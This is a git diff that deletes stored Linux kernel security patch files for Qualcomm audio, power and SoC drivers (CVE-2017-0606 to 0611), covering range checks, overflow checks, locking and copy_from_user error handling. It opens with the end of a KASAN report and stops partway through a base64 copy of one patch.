-Object ffffffc0a360bb00: 28 47 45 a3 c0 ff ff ff 48 47 45 a3 c0 ff ff ff (GE.....HGE.....
-Object ffffffc0a360bb10: 68 47 45 a3 c0 ff ff ff 00 00 00 00 00 00 00 00 hGE.............
-Object ffffffc0a360bb20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
-Object ffffffc0a360bb30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
-CPU: 0 PID: 1 Comm: swapper/0 Tainted: G B 3.10.49-g465b172-00133-gb931dc1 #134
-Call trace:
-[] dump_backtrace+0x0/0x1d4
-[] show_stack+0x10/0x1c
-[] dump_stack+0x1c/0x28
-[] print_trailer+0x144/0x158
-[] object_err+0x38/0x4c
-[] kasan_report_error+0x210/0x3b0
-[] kasan_report+0x68/0x78
-[] __asan_load8+0x90/0x9c
-[] internal_create_group+0x1a0/0x2f4
-[] sysfs_create_group+0x10/0x1c
-[] msm_bcl_register_param+0x384/0x450
-[] bcl_probe+0x840/0xb84
-[] spmi_drv_probe+0x2c/0x3c
-[] driver_probe_device+0x1f4/0x47c
-[] __driver_attach+0x88/0xc0
-[] bus_for_each_dev+0xdc/0x11c
-[] driver_attach+0x2c/0x3c
-[] bus_add_driver+0x1bc/0x32c
-[] driver_register+0x10c/0x1d8
-[] spmi_driver_register+0x98/0xa8
-[] bcl_perph_init+0x2c/0x38
-[] do_one_initcall+0xcc/0x188
-[] kernel_init_freeable+0x1c0/0x264
-[] kernel_init+0x10/0xcc
-Memory state around the buggy address:
- ffffffc0a360ba00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- ffffffc0a360ba80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
->ffffffc0a360bb00: 00 00 00 01 fc fc fc fc fc fc fc fc fc fc fc fc
- ^
- ffffffc0a360bb80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
- ffffffc0a360bc00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
-==================================================================
-
-Fix this by adding parantheses to fix precedence.
-
-CRs-Fixed: 826589
-Change-Id: Ia58b6e52c491b89b10a2b8fe45445372bfe9fa20
-Signed-off-by: David Keitel
----
- drivers/power/msm_bcl.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/power/msm_bcl.c b/drivers/power/msm_bcl.c
-index d36dfd2..6b7cefd 100644
---- a/drivers/power/msm_bcl.c
-+++ b/drivers/power/msm_bcl.c
-@@ -301,7 +301,7 @@ static int bcl_add_sysfs_nodes(enum bcl_param param_type)
- return ret;
- }
- bcl[param_type]->bcl_attr_gp.attrs = kzalloc(sizeof(struct attribute *)
-- * BCL_PARAM_MAX_ATTR + 1, GFP_KERNEL);
-+ * (BCL_PARAM_MAX_ATTR + 1), GFP_KERNEL);
- if (!bcl[param_type]->bcl_attr_gp.attrs) {
- pr_err("Sysfs attribute create failed.\n");
- ret = -ENOMEM;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0606/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0606/ANY/0001.patch
deleted file mode 100644
index 7ad60b22..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0606/ANY/0001.patch
+++ /dev/null
@@ -1,130 +0,0 @@
-From d3237316314c3d6f75a58192971f66e3822cd250 Mon Sep 17 00:00:00 2001
-From: Siena Richard
-Date: Thu, 26 Jan 2017 15:02:42 -0800
-Subject: drivers: soc: add mutex to prevent response being processed twice
-
-Add a mutex to prevent two threads from processing the same response
-at the same time. This ensures responses are processed completely and
-sequentially.
-
-CRs-Fixed: 1116015
-Change-Id: Id2ef32edb939f8af2850b54bd6f6f447939c0732
-Signed-off-by: Siena Richard
----
- drivers/soc/qcom/qdsp6v2/voice_svc.c | 26 ++++++++++++++++++++------
- 1 file changed, 20 insertions(+), 6 deletions(-)
-
-diff --git a/drivers/soc/qcom/qdsp6v2/voice_svc.c b/drivers/soc/qcom/qdsp6v2/voice_svc.c
-index 50dd925..10f71b8 100644
---- a/drivers/soc/qcom/qdsp6v2/voice_svc.c
-+++ b/drivers/soc/qcom/qdsp6v2/voice_svc.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -42,6 +42,12 @@ struct voice_svc_prvt {
- struct list_head response_queue;
- wait_queue_head_t response_wait;
- spinlock_t response_lock;
-+ /*
-+ * This mutex ensures responses are processed in sequential order and
-+ * that no two threads access and free the same response at the same
-+ * time.
-+ */
-+ struct mutex response_mutex_lock;
- };
-
- struct apr_data {
-@@ -467,6 +473,7 @@ static ssize_t voice_svc_read(struct file *file, char __user *arg,
- goto done;
- }
-
-+ mutex_lock(&prtd->response_mutex_lock);
- spin_lock_irqsave(&prtd->response_lock, spin_flags);
-
- if (list_empty(&prtd->response_queue)) {
-@@ -480,7 +487,7 @@ static ssize_t voice_svc_read(struct file *file, char __user *arg,
- pr_debug("%s: Read timeout\n", __func__);
-
- ret = -ETIMEDOUT;
-- goto done;
-+ goto unlock;
- } else if (ret > 0 && !list_empty(&prtd->response_queue)) {
- pr_debug("%s: Interrupt recieved for response\n",
- __func__);
-@@ -488,7 +495,7 @@ static ssize_t voice_svc_read(struct file *file, char __user *arg,
- pr_debug("%s: Interrupted by SIGNAL %d\n",
- __func__, ret);
-
-- goto done;
-+ goto unlock;
- }
-
- spin_lock_irqsave(&prtd->response_lock, spin_flags);
-@@ -507,7 +514,7 @@ static ssize_t voice_svc_read(struct file *file, char __user *arg,
- __func__, count, size);
-
- ret = -ENOMEM;
-- goto done;
-+ goto unlock;
- }
-
- if (!access_ok(VERIFY_WRITE, arg, size)) {
-@@ -515,7 +522,7 @@ static ssize_t voice_svc_read(struct file *file, char __user *arg,
- __func__);
-
- ret = -EPERM;
-- goto done;
-+ goto unlock;
- }
-
- ret = copy_to_user(arg, &resp->resp,
-@@ -525,7 +532,7 @@ static ssize_t voice_svc_read(struct file *file, char __user *arg,
- pr_err("%s: copy_to_user failed %d\n", __func__, ret);
-
- ret = -EPERM;
-- goto done;
-+ goto unlock;
- }
-
- spin_lock_irqsave(&prtd->response_lock, spin_flags);
-@@ -539,6 +546,8 @@ static ssize_t voice_svc_read(struct file *file, char __user *arg,
-
- ret = count;
-
-+unlock:
-+ mutex_unlock(&prtd->response_mutex_lock);
- done:
- return ret;
- }
-@@ -594,6 +603,7 @@ static int voice_svc_open(struct inode *inode, struct file *file)
- INIT_LIST_HEAD(&prtd->response_queue);
- init_waitqueue_head(&prtd->response_wait);
- spin_lock_init(&prtd->response_lock);
-+ mutex_init(&prtd->response_mutex_lock);
- file->private_data = (void *)prtd;
-
- /* Current APR implementation doesn't support session based
-@@ -644,6 +654,7 @@ static int voice_svc_release(struct inode *inode, struct file *file)
- pr_err("%s: Failed to dereg MVM %d\n", __func__, ret);
- }
-
-+ mutex_lock(&prtd->response_mutex_lock);
- spin_lock_irqsave(&prtd->response_lock, spin_flags);
-
- while (!list_empty(&prtd->response_queue)) {
-@@ -657,6 +668,9 @@ static int voice_svc_release(struct inode *inode, struct file *file)
- }
-
- spin_unlock_irqrestore(&prtd->response_lock, spin_flags);
-+ mutex_unlock(&prtd->response_mutex_lock);
-+
-+ mutex_destroy(&prtd->response_mutex_lock);
-
- kfree(file->private_data);
- file->private_data = NULL;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0607/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0607/ANY/0001.patch
deleted file mode 100644
index 1e82a147..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0607/ANY/0001.patch
+++ /dev/null
@@ -1,74 +0,0 @@
-From b003c8d5407773d3aa28a48c9841e4c124da453d Mon Sep 17 00:00:00 2001
-From: Banajit Goswami
-Date: Thu, 3 Nov 2016 19:18:07 -0700
-Subject: ASoC: msm: q6dspv2: use correct variable type to store ION buff size
-
-The size of the physical memory allocated for ION buffers
-are of type size_t. Change updates the type of variables
-sent to ION drivers to size_t to avoid any mismatch.
-
-Change-Id: I3d33ed922b979652c64027e6f1c6f0a8ed4850a3
-Signed-off-by: Banajit Goswami
----
- sound/soc/msm/qdsp6v2/q6asm.c | 10 ++++++----
- sound/soc/msm/qdsp6v2/q6voice.h | 2 +-
- 2 files changed, 7 insertions(+), 5 deletions(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/q6asm.c b/sound/soc/msm/qdsp6v2/q6asm.c
-index 0ea94cb..ea57cda 100644
---- a/sound/soc/msm/qdsp6v2/q6asm.c
-+++ b/sound/soc/msm/qdsp6v2/q6asm.c
-@@ -3013,7 +3013,8 @@ int q6asm_set_shared_circ_buff(struct audio_client *ac,
- int dir)
- {
- struct audio_buffer *buf_circ;
-- int bytes_to_alloc, rc, len;
-+ int bytes_to_alloc, rc;
-+ size_t len;
-
- buf_circ = kzalloc(sizeof(struct audio_buffer), GFP_KERNEL);
-
-@@ -3032,7 +3033,7 @@ int q6asm_set_shared_circ_buff(struct audio_client *ac,
- rc = msm_audio_ion_alloc("audio_client", &buf_circ->client,
- &buf_circ->handle, bytes_to_alloc,
- (ion_phys_addr_t *)&buf_circ->phys,
-- (size_t *)&len, &buf_circ->data);
-+ &len, &buf_circ->data);
-
- if (rc) {
- pr_err("%s: Audio ION alloc is failed, rc = %d\n", __func__,
-@@ -3074,7 +3075,8 @@ int q6asm_set_shared_pos_buff(struct audio_client *ac,
- int dir)
- {
- struct audio_buffer *buf_pos = &ac->shared_pos_buf;
-- int len, rc;
-+ int rc;
-+ size_t len;
- int bytes_to_alloc = sizeof(struct asm_shared_position_buffer);
-
- mutex_lock(&ac->cmd_lock);
-@@ -3083,7 +3085,7 @@ int q6asm_set_shared_pos_buff(struct audio_client *ac,
-
- rc = msm_audio_ion_alloc("audio_client", &buf_pos->client,
- &buf_pos->handle, bytes_to_alloc,
-- (ion_phys_addr_t *)&buf_pos->phys, (size_t *)&len,
-+ (ion_phys_addr_t *)&buf_pos->phys, &len,
- &buf_pos->data);
-
- if (rc) {
-diff --git a/sound/soc/msm/qdsp6v2/q6voice.h b/sound/soc/msm/qdsp6v2/q6voice.h
-index 3b3e728..834fe7c 100644
---- a/sound/soc/msm/qdsp6v2/q6voice.h
-+++ b/sound/soc/msm/qdsp6v2/q6voice.h
-@@ -142,7 +142,7 @@ struct share_mem_buf {
- struct mem_map_table {
- dma_addr_t phys;
- void *data;
-- uint32_t size; /* size of buffer */
-+ size_t size; /* size of buffer */
- struct ion_handle *handle;
- struct ion_client *client;
- };
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0608/4.4/0001.patch b/Patches/Linux_CVEs/CVE-2017-0608/4.4/0001.patch
deleted file mode 100644
index 7927afa7..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0608/4.4/0001.patch
+++ /dev/null
@@ -1,49 +0,0 @@
-From 167a094eac4383809dd703d96fb88c406dd8786b Mon Sep 17 00:00:00 2001
-From: Xiaoyu Ye
-Date: Tue, 20 Dec 2016 10:56:59 -0800
-Subject: mfd: wcd9xxx: Add range checking in function wcd9xxx_init_slimslave
-
-Range checking is added to prevent buffer overflow.
-
-CRs-Fixed: 1098363
-Change-Id: I5871a3a11ec5f5106a386bf149d7ec22605f3db8
-Signed-off-by: Xiaoyu Ye
----
- drivers/mfd/wcd9xxx-slimslave.c | 10 +++++++++-
- 1 file changed, 9 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/mfd/wcd9xxx-slimslave.c b/drivers/mfd/wcd9xxx-slimslave.c
-index 4bce440..1ac7b59 100644
---- a/drivers/mfd/wcd9xxx-slimslave.c
-+++ b/drivers/mfd/wcd9xxx-slimslave.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -62,6 +62,10 @@ int wcd9xxx_init_slimslave(struct wcd9xxx *wcd9xxx, u8 wcd9xxx_pgd_la,
- goto err;
- }
-
-+ if (!rx_num || rx_num > wcd9xxx->num_rx_port) {
-+ pr_err("%s: invalid rx num %d\n", __func__, rx_num);
-+ return -EINVAL;
-+ }
- if (wcd9xxx->rx_chs) {
- wcd9xxx->num_rx_port = rx_num;
- for (i = 0; i < rx_num; i++) {
-@@ -84,6 +88,10 @@ int wcd9xxx_init_slimslave(struct wcd9xxx *wcd9xxx, u8 wcd9xxx_pgd_la,
- wcd9xxx->num_rx_port);
- }
-
-+ if (!tx_num || tx_num > wcd9xxx->num_tx_port) {
-+ pr_err("%s: invalid tx num %d\n", __func__, tx_num);
-+ return -EINVAL;
-+ }
- if (wcd9xxx->tx_chs) {
- wcd9xxx->num_tx_port = tx_num;
- for (i = 0; i < tx_num; i++) {
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0608/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-0608/4.4/0002.patch
deleted file mode 100644
index 0b4299e7..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0608/4.4/0002.patch
+++ /dev/null
@@ -1,52 +0,0 @@
-From b66f442dd97c781e873e8f7b248e197f86fd2980 Mon Sep 17 00:00:00 2001
-From: Xiaoyu Ye
-Date: Mon, 19 Dec 2016 18:38:53 -0800
-Subject: ASoC: msm: qdsp6v2: Add range checking in msm_dai_q6_set_channel_map
-
-Range checking is added to prevent buffer overflow that due to inputs
-can be set by user space.
-
-CRs-Fixed: 1098363
-Change-Id: I057261291806240ee6d7b8106a5e83a7665e013d
-Signed-off-by: Xiaoyu Ye
----
- sound/soc/msm/qdsp6v2/msm-dai-q6-v2.c | 12 +++++++++++-
- 1 file changed, 11 insertions(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-dai-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-dai-q6-v2.c
-index 26cdd0f..fa21ec5 100644
---- a/sound/soc/msm/qdsp6v2/msm-dai-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-dai-q6-v2.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -1889,6 +1889,11 @@ static int msm_dai_q6_set_channel_map(struct snd_soc_dai *dai,
- pr_err("%s: rx slot not found\n", __func__);
- return -EINVAL;
- }
-+ if (rx_num > AFE_PORT_MAX_AUDIO_CHAN_CNT) {
-+ pr_err("%s: invalid rx num %d\n", __func__, rx_num);
-+ return -EINVAL;
-+ }
-+
- for (i = 0; i < rx_num; i++) {
- dai_data->port_config.slim_sch.shared_ch_mapping[i] =
- rx_slot[i];
-@@ -1922,6 +1927,11 @@ static int msm_dai_q6_set_channel_map(struct snd_soc_dai *dai,
- pr_err("%s: tx slot not found\n", __func__);
- return -EINVAL;
- }
-+ if (tx_num > AFE_PORT_MAX_AUDIO_CHAN_CNT) {
-+ pr_err("%s: invalid tx num %d\n", __func__, tx_num);
-+ return -EINVAL;
-+ }
-+
- for (i = 0; i < tx_num; i++) {
- dai_data->port_config.slim_sch.shared_ch_mapping[i] =
- tx_slot[i];
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0609/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0609/ANY/0001.patch
deleted file mode 100644
index 8ae0e3a5..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0609/ANY/0001.patch
+++ /dev/null
@@ -1,137 +0,0 @@
-From 38a83df036084c00e8c5a4599c8ee7880b4ee567 Mon Sep 17 00:00:00 2001
-From: Walter Yang
-Date: Wed, 21 Dec 2016 14:43:46 +0800
-Subject: ASoC: msm-cpe-lsm: cleanup ioctl functions
-
-Some of the ioctl command handling is not properly using the
-copy_from_user interface. Fix these issues and cleanup the ioctl
-functions to make sure there is no illegal memory access.
-
-CRs-Fixed: 1090482
-Change-Id: Ib18e4b132d3487a3103335768aad5df2ebe13f2d
-Signed-off-by: Walter Yang
----
- sound/soc/msm/msm-cpe-lsm.c | 51 +++++++++++++--------------------------------
- 1 file changed, 14 insertions(+), 37 deletions(-)
-
-diff --git a/sound/soc/msm/msm-cpe-lsm.c b/sound/soc/msm/msm-cpe-lsm.c
-index ef4c9b0..0b77e8c 100644
---- a/sound/soc/msm/msm-cpe-lsm.c
-+++ b/sound/soc/msm/msm-cpe-lsm.c
-@@ -1179,13 +1179,6 @@ static int msm_cpe_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- dev_dbg(rtd->dev,
- "%s: %s\n",
- __func__, "SNDRV_LSM_REG_SND_MODEL_V2");
-- if (!arg) {
-- dev_err(rtd->dev,
-- "%s: Invalid argument to ioctl %s\n",
-- __func__,
-- "SNDRV_LSM_REG_SND_MODEL_V2");
-- return -EINVAL;
-- }
-
- memcpy(&snd_model, arg,
- sizeof(struct snd_lsm_sound_model_v2));
-@@ -1328,13 +1321,6 @@ static int msm_cpe_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- dev_dbg(rtd->dev,
- "%s: %s\n",
- __func__, "SNDRV_LSM_EVENT_STATUS");
-- if (!arg) {
-- dev_err(rtd->dev,
-- "%s: Invalid argument to ioctl %s\n",
-- __func__,
-- "SNDRV_LSM_EVENT_STATUS");
-- return -EINVAL;
-- }
-
- user = arg;
-
-@@ -1437,12 +1423,6 @@ static int msm_cpe_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- break;
-
- case SNDRV_LSM_SET_PARAMS:
-- if (!arg) {
-- dev_err(rtd->dev,
-- "%s: %s Invalid argument\n",
-- __func__, "SNDRV_LSM_SET_PARAMS");
-- return -EINVAL;
-- }
- memcpy(&det_params, arg,
- sizeof(det_params));
- if (det_params.num_confidence_levels <= 0) {
-@@ -2289,12 +2269,6 @@ done:
- }
-
- #ifdef CONFIG_COMPAT
--struct snd_lsm_event_status32 {
-- u16 status;
-- u16 payload_size;
-- u8 payload[0];
--};
--
- struct snd_lsm_sound_model_v2_32 {
- compat_uptr_t data;
- compat_uptr_t confidence_level;
-@@ -2326,8 +2300,6 @@ struct snd_lsm_module_params_32 {
- };
-
- enum {
-- SNDRV_LSM_EVENT_STATUS32 =
-- _IOW('U', 0x02, struct snd_lsm_event_status32),
- SNDRV_LSM_REG_SND_MODEL_V2_32 =
- _IOW('U', 0x07, struct snd_lsm_sound_model_v2_32),
- SNDRV_LSM_SET_PARAMS32 =
-@@ -2421,7 +2393,7 @@ static int msm_cpe_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- err);
- }
- break;
-- case SNDRV_LSM_EVENT_STATUS32: {
-+ case SNDRV_LSM_EVENT_STATUS: {
- struct snd_lsm_event_status *event_status = NULL;
- struct snd_lsm_event_status u_event_status32;
- struct snd_lsm_event_status *udata_32 = NULL;
-@@ -2463,7 +2435,6 @@ static int msm_cpe_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- } else {
- event_status->payload_size =
- u_event_status32.payload_size;
-- cmd = SNDRV_LSM_EVENT_STATUS;
- err = msm_cpe_lsm_ioctl_shared(substream,
- cmd, event_status);
- if (err)
-@@ -2563,13 +2534,6 @@ static int msm_cpe_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- return -EINVAL;
- }
-
-- if (!arg) {
-- dev_err(rtd->dev,
-- "%s: %s: No Param data to set\n",
-- __func__, "SET_MODULE_PARAMS_32");
-- return -EINVAL;
-- }
--
- if (copy_from_user(&p_data_32, arg,
- sizeof(p_data_32))) {
- dev_err(rtd->dev,
-@@ -2647,6 +2611,19 @@ static int msm_cpe_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- kfree(params32);
- break;
- }
-+ case SNDRV_LSM_REG_SND_MODEL_V2:
-+ case SNDRV_LSM_SET_PARAMS:
-+ case SNDRV_LSM_SET_MODULE_PARAMS:
-+ /*
-+ * In ideal cases, the compat_ioctl should never be called
-+ * with the above unlocked ioctl commands. Print error
-+ * and return error if it does.
-+ */
-+ dev_err(rtd->dev,
-+ "%s: Invalid cmd for compat_ioctl\n",
-+ __func__);
-+ err = -EINVAL;
-+ break;
- default:
- err = msm_cpe_lsm_ioctl_shared(substream, cmd, arg);
- break;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0610/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0610/ANY/0001.patch
deleted file mode 100644
index 04de703c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0610/ANY/0001.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From 65009746a6e649779f73d665934561ea983892fe Mon Sep 17 00:00:00 2001
-From: Siena Richard
-Date: Mon, 5 Dec 2016 12:26:52 -0800
-Subject: ASoC: msm: qdsp6v2: return error when copy from userspace fails
-
-A copy_from_user is not always expected to succeed. Therefore, check
-for an error before operating on the buffer post copy.
-
-Change-Id: Ibba9a47c84e735d30e32eeac5b80d51044b7a9e8
-CRs-Fixed: 1094852
-Signed-off-by: Siena Richard
----
- sound/soc/msm/qdsp6v2/msm-pcm-voip-v2.c | 5 +++++
- 1 file changed, 5 insertions(+)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-voip-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-voip-v2.c
-index 6570819..c444a27 100644
---- a/sound/soc/msm/qdsp6v2/msm-pcm-voip-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-voip-v2.c
-@@ -823,6 +823,11 @@ static int msm_pcm_playback_copy(struct snd_pcm_substream *substream, int a,
- (sizeof(buf_node->frame.frm_hdr) +
- sizeof(buf_node->frame.pktlen));
- }
-+ if (ret) {
-+ pr_err("%s: copy from user failed %d\n",
-+ __func__, ret);
-+ return -EFAULT;
-+ }
- spin_lock_irqsave(&prtd->dsp_lock, dsp_flags);
- list_add_tail(&buf_node->list, &prtd->in_queue);
- spin_unlock_irqrestore(&prtd->dsp_lock, dsp_flags);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0610/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2017-0610/ANY/0002.patch
deleted file mode 100644
index 88feecdf..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0610/ANY/0002.patch
+++ /dev/null
@@ -1,59 +0,0 @@
-From 2bf336ed7ff29768b63fcf0d9528dd129f516643 Mon Sep 17 00:00:00 2001
-From: Siena Richard
-Date: Tue, 31 Jan 2017 12:21:38 -0800
-Subject: ASoC: msm: qdsp6v2: return error when copy from userspace fails
-
-A copy_from_user is not always expected to succeed. Therefore, check
-for an error before operating on the buffer post copy.
-
-CRs-Fixed: 1116070
-Change-Id: I21032719e6e85f280ca0cda875c84ac8dee8916b
-Signed-off-by: Siena Richard
----
- sound/soc/msm/qdsp6v2/msm-pcm-voip-v2.c | 17 +++++++++++------
- 1 file changed, 11 insertions(+), 6 deletions(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-voip-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-voip-v2.c
-index c444a27..b2387a7 100644
---- a/sound/soc/msm/qdsp6v2/msm-pcm-voip-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-voip-v2.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -814,20 +814,25 @@ static int msm_pcm_playback_copy(struct snd_pcm_substream *substream, int a,
- if (prtd->mode == MODE_PCM) {
- ret = copy_from_user(&buf_node->frame.voc_pkt,
- buf, count);
-+ if (ret) {
-+ pr_err("%s: copy from user failed %d\n",
-+ __func__, ret);
-+ return -EFAULT;
-+ }
- buf_node->frame.pktlen = count;
- } else {
- ret = copy_from_user(&buf_node->frame,
- buf, count);
-+ if (ret) {
-+ pr_err("%s: copy from user failed %d\n",
-+ __func__, ret);
-+ return -EFAULT;
-+ }
- if (buf_node->frame.pktlen >= count)
- buf_node->frame.pktlen = count -
- (sizeof(buf_node->frame.frm_hdr) +
- sizeof(buf_node->frame.pktlen));
- }
-- if (ret) {
-- pr_err("%s: copy from user failed %d\n",
-- __func__, ret);
-- return -EFAULT;
-- }
- spin_lock_irqsave(&prtd->dsp_lock, dsp_flags);
- list_add_tail(&buf_node->list, &prtd->in_queue);
- spin_unlock_irqrestore(&prtd->dsp_lock, dsp_flags);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0611/3.10/0002.patch b/Patches/Linux_CVEs/CVE-2017-0611/3.10/0002.patch
deleted file mode 100644
index 7d417aec..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0611/3.10/0002.patch
+++ /dev/null
@@ -1,54 +0,0 @@
-From da638cc248f0d692a89e26f788c43d6f641c81ef Mon Sep 17 00:00:00 2001
-From: Xiaojun Sang
-Date: Fri, 04 Nov 2016 14:35:58 +0800
-Subject: [PATCH] ASoC: soc: prevent risk of buffer overflow
-
-In case of large value for bufcnt_t or bufcnt,
-cmd_size may overflow. Buffer size allocated by cmd_size might
-be not as expected.
-Possible buffer overflow could happen.
-
-CRs-Fixed: 1084210
-Change-Id: I9556f18dd6a9fdf3f76c133ae75c04ecce171f08
-Signed-off-by: Xiaojun Sang
----
-
-diff --git a/sound/soc/msm/qdsp6v2/q6asm.c b/sound/soc/msm/qdsp6v2/q6asm.c
-index 31bd1d7..11a94e4 100644
---- a/sound/soc/msm/qdsp6v2/q6asm.c
-+++ b/sound/soc/msm/qdsp6v2/q6asm.c
-@@ -4054,7 +4054,7 @@
- struct asm_buffer_node *buffer_node = NULL;
- int rc = 0;
- int i = 0;
-- int cmd_size = 0;
-+ uint32_t cmd_size = 0;
- uint32_t bufcnt_t;
- uint32_t bufsz_t;
-
-@@ -4076,10 +4076,25 @@
- bufsz_t = PAGE_ALIGN(bufsz_t);
- }
-
-+ if (bufcnt_t > (UINT_MAX
-+ - sizeof(struct avs_cmd_shared_mem_map_regions))
-+ / sizeof(struct avs_shared_map_region_payload)) {
-+ pr_err("%s: Unsigned Integer Overflow. bufcnt_t = %u\n",
-+ __func__, bufcnt_t);
-+ return -EINVAL;
-+ }
-+
- cmd_size = sizeof(struct avs_cmd_shared_mem_map_regions)
- + (sizeof(struct avs_shared_map_region_payload)
- * bufcnt_t);
-
-+
-+ if (bufcnt > (UINT_MAX / sizeof(struct asm_buffer_node))) {
-+ pr_err("%s: Unsigned Integer Overflow. bufcnt = %u\n",
-+ __func__, bufcnt);
-+ return -EINVAL;
-+ }
-+
- buffer_node = kzalloc(sizeof(struct asm_buffer_node) * bufcnt,
- GFP_KERNEL);
- if (!buffer_node) {
diff --git a/Patches/Linux_CVEs/CVE-2017-0611/3.10/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2017-0611/3.10/0002.patch.base64
deleted file mode 100644
index 054ba4fd..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0611/3.10/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@ -RnJvbSBkYTYzOGNjMjQ4ZjBkNjkyYTg5ZTI2Zjc4OGM0M2Q2ZjY0MWM4MWVmIE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBYaWFvanVuIFNhbmcgPHhzYW5nQGNvZGVhdXJvcmEub3JnPgpEYXRlOiBGcmksIDA0IE5vdiAyMDE2IDE0OjM1OjU4ICswODAwClN1YmplY3Q6IFtQQVRDSF0gQVNvQzogc29jOiBwcmV2ZW50IHJpc2sgb2YgYnVmZmVyIG92ZXJmbG93CgpJbiBjYXNlIG9mIGxhcmdlIHZhbHVlIGZvciBidWZjbnRfdCBvciBidWZjbnQsCmNtZF9zaXplIG1heSBvdmVyZmxvdy4gQnVmZmVyIHNpemUgYWxsb2NhdGVkIGJ5IGNtZF9zaXplIG1pZ2h0CmJlIG5vdCBhcyBleHBlY3RlZC4KUG9zc2libGUgYnVmZmVyIG92ZXJmbG93IGNvdWxkIGhhcHBlbi4KCkNScy1GaXhlZDogMTA4NDIxMApDaGFuZ2UtSWQ6IEk5NTU2ZjE4ZGQ2YTlmZGYzZjc2YzEzM2FlNzVjMDRlY2NlMTcxZjA4ClNpZ25lZC1vZmYtYnk6IFhpYW9qdW4gU2FuZyA8eHNhbmdAY29kZWF1cm9yYS5vcmc+Ci0tLQoKZGlmZiAtLWdpdCBhL3NvdW5kL3NvYy9tc20vcWRzcDZ2Mi9xNmFzbS5jIGIvc291bmQvc29jL21zbS9xZHNwNnYyL3E2YXNtLmMKaW5kZXggMzFiZDFkNy4uMTFhOTRlNCAxMDA2NDQKLS0tIGEvc291bmQvc29jL21zbS9xZHNwNnYyL3E2YXNtLmMKKysrIGIvc291bmQvc29jL21zbS9xZHNwNnYyL3E2YXNtLmMKQEAgLTQwNTQsNyArNDA1NCw3IEBACiAJc3RydWN0IGFzbV9idWZmZXJfbm9kZSAqYnVmZmVyX25vZGUgPSBOVUxMOwogCWludAlyYyA9IDA7CiAJaW50ICAgIGkgPSAwOwotCWludAljbWRfc2l6ZSA9IDA7CisJdWludDMyX3QgY21kX3NpemUgPSAwOwogCXVpbnQzMl90IGJ1ZmNudF90OwogCXVpbnQzMl90IGJ1ZnN6X3Q7CiAKQEAgLTQwNzYsMTAgKzQwNzYsMjUgQEAKIAkJYnVmc3pfdCA9IFBBR0VfQUxJR04oYnVmc3p